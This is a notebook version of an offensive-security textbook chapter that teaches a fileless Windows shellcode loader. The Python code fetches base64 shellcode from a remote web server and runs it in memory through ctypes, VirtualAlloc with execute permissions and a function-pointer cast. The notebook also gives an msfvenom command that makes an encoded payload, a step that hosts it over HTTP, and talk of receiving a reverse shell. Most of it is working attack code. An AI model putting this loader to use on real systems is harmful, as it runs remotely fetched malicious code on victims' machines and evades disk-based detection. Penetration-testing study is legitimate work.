<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C8-Common_Trojaning_Tasks_On_Windows/Pythonic_Shellcode_Execution.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Pythonic Shellcode Execution__*

There might come a time when you want to be able to interact with one of your target machines, or use a juicy new exploit module from your favorite penetration testing or exploit framework. This typically, though not always, requires some form of shellcode execution. In order to execute raw shellcode without touching the filesystem, we need to create a buffer in memory to hold the shellcode and, using the __ctypes__ module, create a function pointer to that memory. Then we just call the function.

In our case, we'll use __urllib__ to grab the shellcode from a web server in base64 format and then execute it. Let's get started! Open up __shell_exec.py__ and enter the following code:

In [ ]:
from urllib import request

import base64
import ctypes

kernel32 = ctypes.windll.kernel32

def get_code(url):
    with request.urlopen(url) as response: #[1]
        shellcode = base64.decodebytes(response.read())
    return shellcode

def write_memory(buf): #[2]
    length = len(buf)

    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    kernel32.RtlMoveMemory.argtypes = ( #[3]
        ctypes.c_void_p,
        ctypes.c_void_p,
        ctypes.c_size_t,
    )

    ptr = kernel32.VirtualAlloc(None, length, 0x30000, 0x40) #[4]
    kernel32.RtlMoveMemory(ptr, buf, length)
    return ptr

def run(shellcode):
    buffer = ctypes.create_string_buffer(shellcode) #[5]

    ptr = write_memory(buffer)

    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None)) #[6]
    shell_func() #[7]

if __name__ == '__main__':
    url = 'https://192.168.1.203:8100/shellcode.bin'
    shellcode = get_code(url)
    run(shellcode)

How awesome is that? We kick off our main block by calling the __get_code__ function to retrieve the base64-encoded shellcode from our web server __[1]__.
Then we call the __run__ function to write the shellcode into memory and execute it.

In the __run__ function, we allocate a buffer __[5]__ to hold the shellcode after we've decoded it. Next we call the __write_memory__ function to write the buffer into memory __[2]__.

To be able to write into memory, we have to allocate the memory we need (__VirtualAlloc__) and then move the buffer containing the shellcode into that allocated memory (__RtlMoveMemory__). To ensure that the shellcode will run whether we're using 32 or 64 bit Python, we must specify that the result we want back from __VirtualAlloc__ is a pointer, and that the arguments we will give the __RtlMoveMemory__ function are two pointers and a size object.
We do this by setting the __VirtualAlloc.restype__ and the __RtlMoveMemory.argtypes__ __[3]__. Without this step, the width of the memory address returned from __VirtualAlloc__ will not match the width that __RtlMoveMemory__ expects.

In the call to __VirtualAlloc__ __[4]__, the 0x40 parameter specifies that the memory should have permissions set to execute and read/write access; otherwise, we won't be able to write and execute the shellcode. Then we move the buffer into the allocated memory and return the pointer to the buffer. Back in the __run__ function, the __ctypes.cast__ function allows us to cast the buffer to act like a function pointer __[6]__ so that we can call our shellcode as we would call any normal Python function. We finish it up by calling the function pointer, which then causes the shellcode to execute __[7]__.



### *__Kicking the Tires__*

You can hand-code some shellcode or use your favorite pentesting framework like __CANVAS__ or __Metasploit__ to generate it for you. As CANVAS is a commercial tool, take a look at this tutorial for generating Metasploit payloads: http://www.offensive-security.com/metasploit-unleashed/Generating_Payloads/. We picked some Windows x86 shellcode with the Metasploit payload generator (__msfvenom__ in our case). Create the raw shellcode in __/tmp/shellcode.raw__ on your Linux machine as follows:

```
msfvenom -p windows/exec -e x86/shikata_ga_nai -i 1 -f raw cmd=calc.exe > shellcode.raw
$ base64 -w 0 -i shellcode.raw > shellcode.bin

$ python -m http.server 8100
Serving HTTP on 0.0.0.0 port 8100 ...
```

We create the shellcode with __msfvenom__ and then base64-encode it using the standard Linux command __base64__. The next little trick uses the __http.server__ module to treat the current working directory (in our case, __/tmp/__) as its web root. Any HTTP requests for files on port 8100 will be served automatically for you. Now drop your __shell_exec.py__ script on your Windows box and execute it. You should see the following in your Linux terminal:

```
192.168.112.130 - - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200 -
```

This indicates that your script has retrieved the shellcode from the web server you set up using the __http.server__ module. If all goes well, you'll receive a shell back to your framework and will have popped __calc.exe__, gotten a reverse TCP shell, displayed a message box, or whatever your shellcode was compiled for.